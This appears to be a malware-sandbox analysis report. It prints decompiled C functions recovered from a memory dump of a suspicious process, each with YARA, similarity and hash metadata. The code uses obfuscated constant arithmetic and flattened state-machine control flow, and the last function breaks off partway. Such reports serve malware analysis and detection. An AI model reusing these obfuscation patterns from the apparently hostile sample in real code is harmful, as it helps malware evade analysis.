                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: m $+$IP$j_$k$ld8$n2$B
                                              • API String ID: 0-4100556268
                                              • Opcode ID: 53c0d70455acc8be9ded0f7be305dcf12ad6240fd9ab69a77147eb75b764b5f4
                                              • Instruction ID: 04a2df8bd3fef671147067066c4ac440300fdc7d05839039c8312043e0e3f354
                                              • Opcode Fuzzy Hash: 53c0d70455acc8be9ded0f7be305dcf12ad6240fd9ab69a77147eb75b764b5f4
                                              • Instruction Fuzzy Hash: 3BB150B1018380DFD368CF61C98991BBBF1BBC4758F508A1EF196962A0C7B58A19CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 98%
                                              			E0022B75F() {
                                              				signed int _v4;
                                              				char _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				void* _t216;
                                              				intOrPtr* _t217;
                                              				void* _t218;
                                              				intOrPtr _t226;
                                              				intOrPtr* _t227;
                                              				signed int _t228;
                                              				signed int _t229;
                                              				signed int _t230;
                                              				signed int _t231;
                                              				signed int _t232;
                                              				signed int _t233;
                                              				signed int _t234;
                                              				signed int _t235;
                                              				void* _t236;
                                              				void* _t241;
                                              				void* _t265;
                                              				signed int* _t269;
                                              
                                              				_t269 =  &_v88;
                                              				_v64 = 0xcca9;
                                              				_v64 = _v64 | 0x3d0c477d;
                                              				_v64 = _v64 + 0x3ec7;
                                              				_v64 = _v64 ^ 0xbd0d0ec5;
                                              				_v60 = 0x38c3;
                                              				_v60 = _v60 << 4;
                                              				_v60 = _v60 >> 6;
                                              				_v60 = _v60 ^ 0x00000e32;
                                              				_v88 = 0xa439;
                                              				_v88 = _v88 + 0x34d8;
                                              				_v88 = _v88 << 0xe;
                                              				_v4 = 0;
                                              				_v88 = _v88 * 0x46;
                                              				_t265 = 0x32863a22;
                                              				_v88 = _v88 ^ 0xd6a9fef0;
                                              				_v32 = 0x5041;
                                              				_v32 = _v32 ^ 0x94936571;
                                              				_v32 = _v32 ^ 0x94934631;
                                              				_v52 = 0x47aa;
                                              				_t228 = 0x6b;
                                              				_v52 = _v52 * 0x59;
                                              				_v52 = _v52 / _t228;
                                              				_v52 = _v52 ^ 0x00001934;
                                              				_v76 = 0x9d13;
                                              				_v76 = _v76 | 0xffbf7fdf;
                                              				_t229 = 0x4b;
                                              				_v76 = _v76 * 0x38;
                                              				_v76 = _v76 ^ 0xf1ffac33;
                                              				_v56 = 0x2528;
                                              				_v56 = _v56 ^ 0xff11bbbe;
                                              				_v56 = _v56 / _t229;
                                              				_v56 = _v56 ^ 0x0366a499;
                                              				_v80 = 0x942e;
                                              				_t230 = 0x65;
                                              				_v80 = _v80 / _t230;
                                              				_v80 = _v80 << 0x10;
                                              				_v80 = _v80 ^ 0x4cc19e00;
                                              				_v80 = _v80 ^ 0x4db6b316;
                                              				_v28 = 0xb3;
                                              				_t231 = 0x4f;
                                              				_v28 = _v28 / _t231;
                                              				_v28 = _v28 ^ 0x00007dc1;
                                              				_v84 = 0xb6fa;
                                              				_t232 = 0x7e;
                                              				_v84 = _v84 * 0x7b;
                                              				_v84 = _v84 + 0x74c4;
                                              				_v84 = _v84 + 0xffff1df9;
                                              				_v84 = _v84 ^ 0x005758b1;
                                              				_v48 = 0xb943;
                                              				_v48 = _v48 / _t232;
                                              				_v48 = _v48 << 0xe;
                                              				_v48 = _v48 ^ 0x005e2ced;
                                              				_v24 = 0x593;
                                              				_t233 = 0x59;
                                              				_t225 = _v4;
                                              				_v24 = _v24 * 0x2c;
                                              				_v24 = _v24 ^ 0x0000804c;
                                              				_v72 = 0xf7ad;
                                              				_v72 = _v72 / _t233;
                                              				_v72 = _v72 << 8;
                                              				_v72 = _v72 + 0xb94c;
                                              				_v72 = _v72 ^ 0x0003edcb;
                                              				_v20 = 0xede5;
                                              				_t234 = 0x17;
                                              				_v20 = _v20 / _t234;
                                              				_v20 = _v20 ^ 0x00002281;
                                              				_v40 = 0x2895;
                                              				_v40 = _v40 << 7;
                                              				_v40 = _v40 << 8;
                                              				_v40 = _v40 ^ 0x144a8d7d;
                                              				_v44 = 0x7178;
                                              				_v44 = _v44 >> 0xa;
                                              				_t235 = 0xf;
                                              				_v44 = _v44 / _t235;
                                              				_v44 = _v44 ^ 0x00005c52;
                                              				_v68 = 0xc8ae;
                                              				_v68 = _v68 | 0xfda66fe8;
                                              				_v68 = _v68 << 0xa;
                                              				_v68 = _v68 >> 5;
                                              				_v68 = _v68 ^ 0x04dddb27;
                                              				_v12 = 0xea07;
                                              				_v12 = _v12 + 0xffffa6b0;
                                              				_v12 = _v12 ^ 0x0000adca;
                                              				_v16 = 0x7743;
                                              				_v16 = _v16 | 0x2d86c018;
                                              				_v16 = _v16 ^ 0x2d86a9dd;
                                              				_v36 = 0x116e;
                                              				_v36 = _v36 >> 0xc;
                                              				_v36 = _v36 ^ 0x542dd378;
                                              				_v36 = _v36 ^ 0x542dcb57;
                                              				while(1) {
                                              					L1:
                                              					_t236 = 0x5c;
                                              					_t216 = 0x1a27fc18;
                                              					do {
                                              						while(_t265 != 0x14fc2c0b) {
                                              							if(_t265 == _t216) {
                                              								_t217 = E0022E22B(_v20, _v40, _v8, _t225, _v44);
                                              								_t269 =  &(_t269[3]);
                                              								__eflags = _t217;
                                              								_t265 = 0x35b0a114;
                                              								_v4 = 0 | __eflags == 0x00000000;
                                              								goto L1;
                                              							} else {
                                              								if(_t265 == 0x2364314f) {
                                              									_push(_v32);
                                              									_t218 = E0023889D(0x23c9d0, _v88, __eflags);
                                              									_pop(_t241);
                                              									__eflags = E00233EB3(_v52, _t241, _t218, _v76, _v56, 0x23c9d0, _v80, _v28, 0x23c9d0, _v84, 0x23c9d0, _v60, _v64,  &_v8);
                                              									_t265 =  ==  ? 0x1a27fc18 : 0x34b93fb8;
                                              									E00232025(_v48, _t218, _v24, _v72);
                                              									_t269 =  &(_t269[0xf]);
                                              									_t236 = 0x5c;
                                              									L16:
                                              									_t216 = 0x1a27fc18;
                                              									goto L17;
                                              								} else {
                                              									if(_t265 == 0x32863a22) {
                                              										_t265 = 0x14fc2c0b;
                                              										continue;
                                              									} else {
                                              										if(_t265 != 0x35b0a114) {
                                              											goto L17;
                                              										} else {
                                              											E002265A2(_v8, _v68, _v12, _v16, _v36);
                                              										}
                                              									}
                                              								}
                                              							}
                                              							L8:
                                              							return _v4;
                                              						}
                                              						_t226 =  *0x23ca2c; // 0x4d8300
                                              						_t227 = _t226 + 0x230;
                                              						while(1) {
                                              							__eflags =  *_t227 - _t236;
                                              							if( *_t227 == _t236) {
                                              								break;
                                              							}
                                              							_t227 = _t227 + 2;
                                              							__eflags = _t227;
                                              						}
                                              						_t225 = _t227 + 2;
                                              						__eflags = _t227 + 2;
                                              						_t265 = 0x2364314f;
                                              						goto L16;
                                              						L17:
                                              						__eflags = _t265 - 0x34b93fb8;
                                              					} while (__eflags != 0);
                                              					goto L8;
                                              				}
                                              			}
                                              0x0022ba07
                                              0x0022ba07
                                              0x0022ba09
                                              0x0022ba0a
                                              0x0022ba0f
                                              0x0022ba0f
                                              0x0022ba19
                                              0x0022bae9
                                              0x0022baf0
                                              0x0022baf3
                                              0x0022baf5
                                              0x0022bafd
                                              0x00000000
                                              0x0022ba1f
                                              0x0022ba25
                                              0x0022ba67
                                              0x0022ba74
                                              0x0022ba79
                                              0x0022baaf
                                              0x0022bac8
                                              0x0022bacb
                                              0x0022bad0
                                              0x0022bad5
                                              0x0022bb24
                                              0x0022bb24
                                              0x00000000
                                              0x0022ba27
                                              0x0022ba2d
                                              0x0022ba63
                                              0x00000000
                                              0x0022ba2f
                                              0x0022ba35
                                              0x00000000
                                              0x0022ba3b
                                              0x0022ba4f
                                              0x0022ba54
                                              0x0022ba35
                                              0x0022ba2d
                                              0x0022ba25
                                              0x0022ba57
                                              0x0022ba62
                                              0x0022ba62
                                              0x0022bb06
                                              0x0022bb0c
                                              0x0022bb17
                                              0x0022bb17
                                              0x0022bb1a
                                              0x00000000
                                              0x00000000
                                              0x0022bb14
                                              0x0022bb14
                                              0x0022bb14
                                              0x0022bb1c
                                              0x0022bb1c
                                              0x0022bb1f
                                              0x00000000
                                              0x0022bb29
                                              0x0022bb29
                                              0x0022bb29
                                              0x00000000
                                              0x0022bb35

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: (%$AP$Cw$O1d#$O1d#$R\$xq$,^
                                              • API String ID: 0-1090126677
                                              • Opcode ID: 41364a0639a97165b38db456de852c8799469e5404c428a6e9f50f06c622ac44
                                              • Instruction ID: 4f8f01bc79bfcaa9ba32941615f01b569c78b2f2e9784ce87fc35b38b1582d0d
                                              • Opcode Fuzzy Hash: 41364a0639a97165b38db456de852c8799469e5404c428a6e9f50f06c622ac44
                                              • Instruction Fuzzy Hash: E4A143B1509340ABE359CF64D98A91BBBF2FBC4B48F10491DF185862A0D7B9CA59CF43
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 92%
                                              			E0022EA4C(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                              				signed int _v4;
                                              				intOrPtr _v8;
                                              				char _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				void* __ecx;
                                              				void* _t188;
                                              				void* _t219;
                                              				intOrPtr* _t220;
                                              				void* _t222;
                                              				void* _t241;
                                              				void* _t242;
                                              				signed int _t243;
                                              				signed int _t244;
                                              				signed int _t245;
                                              				signed int _t246;
                                              				signed int _t247;
                                              				signed int _t248;
                                              				signed int _t249;
                                              				signed int* _t252;
                                              
                                              				_t220 = _a12;
                                              				_push(_a16);
                                              				_t241 = __edx;
                                              				_push(_t220);
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				E0022602B(_t188);
                                              				_v8 = 0x50f8de;
                                              				_t242 = 0;
                                              				_v4 = _v4 & 0;
                                              				_t252 =  &(( &_v80)[6]);
                                              				_v76 = 0x4711;
                                              				_v76 = _v76 + 0x6e0d;
                                              				_t222 = 0x302d2de5;
                                              				_v76 = _v76 << 0x10;
                                              				_v76 = _v76 | 0x353296c6;
                                              				_v76 = _v76 ^ 0xb53e96c7;
                                              				_v52 = 0x1390;
                                              				_v52 = _v52 << 4;
                                              				_v52 = _v52 | 0x6ec3950a;
                                              				_t243 = 0x1f;
                                              				_v52 = _v52 * 0x25;
                                              				_v52 = _v52 ^ 0x024a5273;
                                              				_v64 = 0xc0d5;
                                              				_v64 = _v64 >> 3;
                                              				_v64 = _v64 ^ 0x4ce1daf8;
                                              				_v64 = _v64 + 0xffff0c87;
                                              				_v64 = _v64 ^ 0x4ce0d906;
                                              				_v24 = 0xb115;
                                              				_v24 = _v24 / _t243;
                                              				_v24 = _v24 ^ 0x000025ae;
                                              				_v68 = 0xbf02;
                                              				_v68 = _v68 >> 1;
                                              				_v68 = _v68 >> 7;
                                              				_v68 = _v68 | 0xaaaffe07;
                                              				_v68 = _v68 ^ 0xaaaf82c8;
                                              				_v72 = 0x967c;
                                              				_v72 = _v72 ^ 0xbb45b93e;
                                              				_t244 = 0x5e;
                                              				_v72 = _v72 * 0x31;
                                              				_v72 = _v72 | 0x543854ee;
                                              				_v72 = _v72 ^ 0xdc3e0629;
                                              				_v28 = 0xb197;
                                              				_v28 = _v28 / _t244;
                                              				_v28 = _v28 ^ 0x00005929;
                                              				_v80 = 0xf6df;
                                              				_v80 = _v80 * 0x2c;
                                              				_v80 = _v80 + 0xffff5b03;
                                              				_v80 = _v80 ^ 0xcc4f4477;
                                              				_v80 = _v80 ^ 0xcc66b212;
                                              				_v60 = 0x7f94;
                                              				_v60 = _v60 * 0x70;
                                              				_v60 = _v60 + 0xffff5d6f;
                                              				_v60 = _v60 + 0xffffe912;
                                              				_v60 = _v60 ^ 0x0037713c;
                                              				_v40 = 0x7639;
                                              				_v40 = _v40 ^ 0xf24db204;
                                              				_v40 = _v40 * 0xf;
                                              				_v40 = _v40 ^ 0x328e289a;
                                              				_v20 = 0xd74f;
                                              				_v20 = _v20 | 0xd22ad029;
                                              				_v20 = _v20 ^ 0xd22a9d24;
                                              				_v16 = 0xecd5;
                                              				_v16 = _v16 << 7;
                                              				_v16 = _v16 ^ 0x0076152b;
                                              				_v44 = 0x5bc3;
                                              				_v44 = _v44 + 0x5ef7;
                                              				_v44 = _v44 | 0x81401b0a;
                                              				_v44 = _v44 >> 0xf;
                                              				_v44 = _v44 ^ 0x00015921;
                                              				_v32 = 0x3f29;
                                              				_t245 = 0x22;
                                              				_v32 = _v32 / _t245;
                                              				_v32 = _v32 >> 0xd;
                                              				_v32 = _v32 ^ 0x00005264;
                                              				_v48 = 0x731;
                                              				_v48 = _v48 | 0x306aed8f;
                                              				_v48 = _v48 + 0xffff48d8;
                                              				_t246 = 0x76;
                                              				_v48 = _v48 / _t246;
                                              				_v48 = _v48 ^ 0x0069195c;
                                              				_v36 = 0x33bb;
                                              				_t247 = 0x45;
                                              				_v36 = _v36 / _t247;
                                              				_v36 = _v36 + 0xffffe7cb;
                                              				_v36 = _v36 ^ 0xfffff379;
                                              				_v56 = 0xdfcb;
                                              				_t248 = 0x48;
                                              				_v56 = _v56 / _t248;
                                              				_t249 = 0x3a;
                                              				_v56 = _v56 / _t249;
                                              				_v56 = _v56 * 0x52;
                                              				_v56 = _v56 ^ 0x00005386;
                                              				do {
                                              					while(_t222 != 0x246653ae) {
                                              						if(_t222 == 0x260f4fd2) {
                                              							_push(_t222);
                                              							_push(_t222);
                                              							_t242 = E00228736(_v12);
                                              							if(_t242 != 0) {
                                              								_t222 = 0x246653ae;
                                              								continue;
                                              							}
                                              						} else {
                                              							if(_t222 == 0x2ff0f75c) {
                                              								_t219 = E002359A5(_v64, 0, _t241,  &_v12, _v24, _v68, _v72, _v28, _t222, _v76, _v80);
                                              								_t252 =  &(_t252[0xb]);
                                              								if(_t219 != 0) {
                                              									_t222 = 0x260f4fd2;
                                              									continue;
                                              								}
                                              							} else {
                                              								if(_t222 != 0x302d2de5) {
                                              									goto L11;
                                              								} else {
                                              									_t222 = 0x2ff0f75c;
                                              									continue;
                                              								}
                                              							}
                                              						}
                                              						goto L12;
                                              					}
                                              					E002359A5(_v16, _t242, _t241,  &_v12, _v44, _v32, _v48, _v36, _t222, _v52, _v56);
                                              					_t252 =  &(_t252[0xb]);
                                              					 *_t220 = _v12;
                                              					_t222 = 0x6a13bb9;
                                              					L11:
                                              				} while (_t222 != 0x6a13bb9);
                                              				L12:
                                              				return _t242;
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: n$)?$9v$<q7$dR$--0$--0$T8T
                                              • API String ID: 0-1820671589
                                              • Opcode ID: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
                                              • Instruction ID: 4e0e67054b937493f20d7c8ea760b1c6b4041d4ca9dacbc5126a2b4b7dae3ab1
                                              • Opcode Fuzzy Hash: be8d65528413908eb97d300261921cde85efd59b20c5887c49dbf67893863774
                                              • Instruction Fuzzy Hash: 6C915271009341ABD728CF62C98981FFBF1FBC5B58F404A1DF2968A260C7B68A158F47
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E0023A0AF(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8) {
                                              				intOrPtr _v4;
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				signed int _v108;
                                              				void* _t237;
                                              				void* _t251;
                                              				void* _t256;
                                              				short _t257;
                                              				void* _t258;
                                              				void* _t262;
                                              				signed int _t268;
                                              				signed int _t269;
                                              				void* _t271;
                                              				signed int _t309;
                                              				signed int _t310;
                                              				signed int _t311;
                                              				signed int _t312;
                                              				signed int _t313;
                                              				signed int _t314;
                                              				signed int _t315;
                                              				signed int _t316;
                                              				signed int _t317;
                                              				intOrPtr _t319;
                                              				signed int _t320;
                                              				signed int _t323;
                                              				signed int* _t325;
                                              				void* _t327;
                                              
                                              				_push(_a8);
                                              				_push(_a4);
                                              				_push(__edx);
                                              				_push(__ecx);
                                              				E0022602B(_t237);
                                              				_v8 = _v8 & 0x00000000;
                                              				_t325 =  &(( &_v108)[4]);
                                              				_v36 = 0x3ea4;
                                              				_v36 = _v36 >> 7;
                                              				_t271 = 0x1d995f52;
                                              				_v36 = _v36 ^ 0x0000fd94;
                                              				_v100 = 0xb5d8;
                                              				_t313 = 0x12;
                                              				_v100 = _v100 / _t313;
                                              				_v100 = _v100 + 0xffffd667;
                                              				_v100 = _v100 << 9;
                                              				_v100 = _v100 ^ 0xffc12715;
                                              				_v44 = 0xa7b5;
                                              				_v44 = _v44 + 0x5ef4;
                                              				_v44 = _v44 ^ 0x00014b95;
                                              				_v48 = 0x9389;
                                              				_v48 = _v48 + 0xb0ba;
                                              				_v48 = _v48 ^ 0x000118ce;
                                              				_v88 = 0x5fea;
                                              				_t314 = 0x1c;
                                              				_v88 = _v88 * 0x7c;
                                              				_v88 = _v88 ^ 0x636ec63e;
                                              				_v88 = _v88 ^ 0x63409d32;
                                              				_v16 = 0x76ea;
                                              				_v16 = _v16 << 5;
                                              				_v16 = _v16 ^ 0x000ec3ec;
                                              				_v20 = 0x91aa;
                                              				_v20 = _v20 | 0x0edf39e6;
                                              				_v20 = _v20 ^ 0x0edfdf8b;
                                              				_v52 = 0xaa70;
                                              				_v52 = _v52 + 0x8ed4;
                                              				_v52 = _v52 ^ 0x00017b8d;
                                              				_v104 = 0xa114;
                                              				_v104 = _v104 >> 5;
                                              				_v104 = _v104 << 0xc;
                                              				_v104 = _v104 / _t314;
                                              				_v104 = _v104 ^ 0x0002b555;
                                              				_v108 = 0xd093;
                                              				_v108 = _v108 << 0xa;
                                              				_t315 = 0x69;
                                              				_v108 = _v108 * 0x4a;
                                              				_v108 = _v108 / _t315;
                                              				_v108 = _v108 ^ 0x024bf4a9;
                                              				_v80 = 0x5298;
                                              				_v80 = _v80 | 0xf2bddfef;
                                              				_v80 = _v80 ^ 0xf2bdee35;
                                              				_v84 = 0xad61;
                                              				_v84 = _v84 << 6;
                                              				_v84 = _v84 ^ 0x5376a172;
                                              				_v84 = _v84 ^ 0x535d9bb3;
                                              				_v96 = 0xfad4;
                                              				_v96 = _v96 + 0xc0fb;
                                              				_t316 = 0x75;
                                              				_v96 = _v96 / _t316;
                                              				_t317 = 0x41;
                                              				_t323 = _a8;
                                              				_v96 = _v96 / _t317;
                                              				_v96 = _v96 ^ 0x00007e63;
                                              				_v40 = 0x6cc;
                                              				_v40 = _v40 + 0x5321;
                                              				_v40 = _v40 ^ 0x00002fe7;
                                              				_v76 = 0xe38c;
                                              				_v76 = _v76 + 0x66b4;
                                              				_v76 = _v76 >> 5;
                                              				_v76 = _v76 ^ 0x00001a53;
                                              				_v68 = 0xaffd;
                                              				_v68 = _v68 + 0x9b0e;
                                              				_v68 = _v68 ^ 0x74692a2f;
                                              				_v68 = _v68 ^ 0x74685d67;
                                              				_v92 = 0xd493;
                                              				_v92 = _v92 >> 5;
                                              				_v92 = _v92 + 0xffffb819;
                                              				_v92 = _v92 << 3;
                                              				_v92 = _v92 ^ 0xfffdea97;
                                              				_v32 = 0x61b7;
                                              				_v32 = _v32 >> 0xa;
                                              				_v32 = _v32 ^ 0x00001b97;
                                              				_v72 = 0x8555;
                                              				_v72 = _v72 >> 6;
                                              				_v72 = _v72 >> 7;
                                              				_v72 = _v72 ^ 0x00005e98;
                                              				_v64 = 0xfd5d;
                                              				_v64 = _v64 ^ 0xfb760f92;
                                              				_v64 = _v64 + 0xe44c;
                                              				_v64 = _v64 ^ 0xfb77c0e2;
                                              				_v24 = 0xfd78;
                                              				_v24 = _v24 ^ 0x534e19f9;
                                              				_v24 = _v24 ^ 0x534eb204;
                                              				_v28 = 0xae38;
                                              				_v28 = _v28 ^ 0x0fcca386;
                                              				_v28 = _v28 ^ 0x0fcc33c1;
                                              				_t268 = _a8;
                                              				_v56 = 0x9a6f;
                                              				_v56 = _v56 | 0xcfdc8d68;
                                              				_v56 = _v56 ^ 0xf237fb5d;
                                              				_v56 = _v56 ^ 0x3deb56e2;
                                              				_v12 = 0xde50;
                                              				_v12 = _v12 << 0xc;
                                              				_v12 = _v12 ^ 0x0de56132;
                                              				_v60 = 0x8399;
                                              				_v60 = _v60 ^ 0x95508e48;
                                              				_v60 = _v60 ^ 0xc724022f;
                                              				_v60 = _v60 ^ 0x52742192;
                                              				while(1) {
                                              					L1:
                                              					_t251 = 0x10ef006b;
                                              					do {
                                              						while(1) {
                                              							L2:
                                              							_t327 = _t271 - 0x1d995f52;
                                              							if(_t327 > 0) {
                                              								break;
                                              							}
                                              							if(_t327 == 0) {
                                              								_t271 = 0x1679d154;
                                              								continue;
                                              							} else {
                                              								if(_t271 == 0x829cfc0) {
                                              									_t311 = _v8;
                                              									if(_t311 != 0) {
                                              										do {
                                              											_t320 =  *((intOrPtr*)(_t311 + 0x220));
                                              											E0022F536(_v56, _v12, _v60, _t311);
                                              											_t311 = _t320;
                                              										} while (_t320 != 0);
                                              									}
                                              								} else {
                                              									if(_t271 == _t251) {
                                              										_t312 = _v8;
                                              										_t268 = 0;
                                              										if(_t312 != 0) {
                                              											do {
                                              												E00226636(_t268 * 2 + _t323, _v80, _v84, _v96, _t312 + 0xc);
                                              												_t256 = E00230ADC(_t312 + 0xc, _v40, _v76);
                                              												_t325 =  &(_t325[4]);
                                              												_t269 = _t268 + _t256;
                                              												_t257 = 0x2c;
                                              												 *((short*)(_t323 + _t269 * 2)) = _t257;
                                              												_t268 = _t269 + 1;
                                              												_t312 =  *((intOrPtr*)(_t312 + 0x220));
                                              											} while (_t312 != 0);
                                              											_t251 = 0x10ef006b;
                                              										}
                                              										_t319 = _v4;
                                              										_t271 = 0x33a3af6e;
                                              										_t310 = _a8;
                                              										continue;
                                              									} else {
                                              										if(_t271 == 0x1679d154) {
                                              											E00235A61( &_v8, E00238D1C, _v44, _v48, _v88);
                                              											_t325 =  &(_t325[4]);
                                              											_t271 = 0x20b4c829;
                                              											while(1) {
                                              												L1:
                                              												_t251 = 0x10ef006b;
                                              												goto L2;
                                              											}
                                              										} else {
                                              											if(_t271 != 0x19514a0a) {
                                              												goto L24;
                                              											} else {
                                              												_push(_t271);
                                              												_push(_t271);
                                              												_t323 = E00228736(_t319 + _t319);
                                              												_t251 = 0x10ef006b;
                                              												_t271 =  !=  ? 0x10ef006b : 0x829cfc0;
                                              												continue;
                                              											}
                                              										}
                                              									}
                                              								}
                                              							}
                                              							L28:
                                              							return 0 |  *_a8 != 0x00000000;
                                              						}
                                              						if(_t271 == 0x20b4c829) {
                                              							_t309 = _v8;
                                              							_t319 = 0;
                                              							_v4 = 0;
                                              							if(_t309 != 0) {
                                              								do {
                                              									_t258 = E00230ADC(_t309 + 0xc, _v16, _v20);
                                              									_t309 =  *(_t309 + 0x220);
                                              									_t319 = _t319 + 1 + _t258;
                                              								} while (_t309 != 0);
                                              								_v4 = _t319;
                                              								_t251 = 0x10ef006b;
                                              							}
                                              							_t310 = _a8;
                                              							_t271 = 0x19514a0a;
                                              							goto L24;
                                              						} else {
                                              							if(_t271 == 0x2b3a1c97) {
                                              								E0022F536(_v64, _v24, _v28, _t323);
                                              								_t271 = 0x829cfc0;
                                              								goto L1;
                                              							} else {
                                              								if(_t271 != 0x33a3af6e) {
                                              									goto L24;
                                              								} else {
                                              									_t260 = _t310 + 4;
                                              									 *(_t310 + 4) =  *(_t310 + 4) & 0x00000000;
                                              									_t262 = E00235D1D(_v68, _v92, _v32, _v72, _t268 - 1, _t323, _v36, _t260);
                                              									_t325 =  &(_t325[6]);
                                              									 *_t310 = _t262;
                                              									_t271 = 0x2b3a1c97;
                                              									while(1) {
                                              										L1:
                                              										_t251 = 0x10ef006b;
                                              										goto L2;
                                              									}
                                              								}
                                              							}
                                              						}
                                              						goto L28;
                                              						L24:
                                              					} while (_t271 != 0x202e1177);
                                              					goto L28;
                                              				}
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                              • Associated: 00000007.00000002.2109565490.0000000000220000.00000004.00000001.sdmp
                                              • Associated: 00000007.00000002.2109615859.000000000023C000.00000004.00000001.sdmp
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 2a$L$c~$g]ht$/$V=$_
                                              • API String ID: 0-445983283
                                              • Opcode ID: 36cabe2eea36f0663463007d41d1f7eb45458d77ad148662dea6fbad212e8662
                                              • Instruction ID: be7561e28a32d0ebb029b71a770a6d73ed85de49a417a4e92de81c2d3a768c00
                                              • Opcode Fuzzy Hash: 36cabe2eea36f0663463007d41d1f7eb45458d77ad148662dea6fbad212e8662
                                              • Instruction Fuzzy Hash: 4CD172B25187818FD368CF61D08991BBBE1FBC4718F60891DF5D6862A0C7B49919CF83
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 96%
                                              			E00237F1F(void* __ecx) {
                                              				intOrPtr _v4;
                                              				intOrPtr _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				signed int _v36;
                                              				signed int _v40;
                                              				signed int _v44;
                                              				signed int _v48;
                                              				signed int _v52;
                                              				signed int _v56;
                                              				signed int _v60;
                                              				signed int _v64;
                                              				signed int _v68;
                                              				signed int _v72;
                                              				signed int _v76;
                                              				signed int _v80;
                                              				signed int _v84;
                                              				signed int _v88;
                                              				signed int _v92;
                                              				signed int _v96;
                                              				signed int _v100;
                                              				signed int _v104;
                                              				void* _t229;
                                              				void* _t232;
                                              				void* _t233;
                                              				void* _t236;
                                              				void* _t238;
                                              				void* _t241;
                                              				void* _t246;
                                              				void* _t247;
                                              				signed int _t249;
                                              				signed int _t250;
                                              				signed int _t251;
                                              				signed int _t252;
                                              				signed int _t253;
                                              				intOrPtr _t271;
                                              				void* _t272;
                                              				signed int* _t274;
                                              				void* _t277;
                                              
                                              				_t274 =  &_v104;
                                              				_v16 = 0x432510;
                                              				_v12 = 0x57033b;
                                              				_v8 = 0x70a374;
                                              				_t271 = 0;
                                              				_t247 = __ecx;
                                              				_v4 = 0;
                                              				_t272 = 0x285a15;
                                              				_v52 = 0x28a8;
                                              				_v52 = _v52 << 0xb;
                                              				_t249 = 0x64;
                                              				_v52 = _v52 / _t249;
                                              				_v52 = _v52 ^ 0x00032641;
                                              				_v56 = 0x58c1;
                                              				_v56 = _v56 ^ 0x08ae2152;
                                              				_v56 = _v56 ^ 0xe42bbac7;
                                              				_v56 = _v56 ^ 0xec85f018;
                                              				_v60 = 0x32b9;
                                              				_v60 = _v60 >> 7;
                                              				_v60 = _v60 ^ 0x4ab7c61f;
                                              				_v60 = _v60 ^ 0x4ab7bf69;
                                              				_v88 = 0xcc29;
                                              				_v88 = _v88 << 7;
                                              				_v88 = _v88 >> 0xe;
                                              				_t250 = 0x27;
                                              				_v88 = _v88 * 0x71;
                                              				_v88 = _v88 ^ 0x00008073;
                                              				_v28 = 0x82bf;
                                              				_v28 = _v28 / _t250;
                                              				_v28 = _v28 ^ 0x0000421a;
                                              				_v80 = 0xde89;
                                              				_v80 = _v80 | 0x25f7ab60;
                                              				_v80 = _v80 + 0xffffb767;
                                              				_v80 = _v80 ^ 0x25f7d2d5;
                                              				_v84 = 0xb172;
                                              				_v84 = _v84 | 0x58f01ffb;
                                              				_v84 = _v84 ^ 0x6aa9a845;
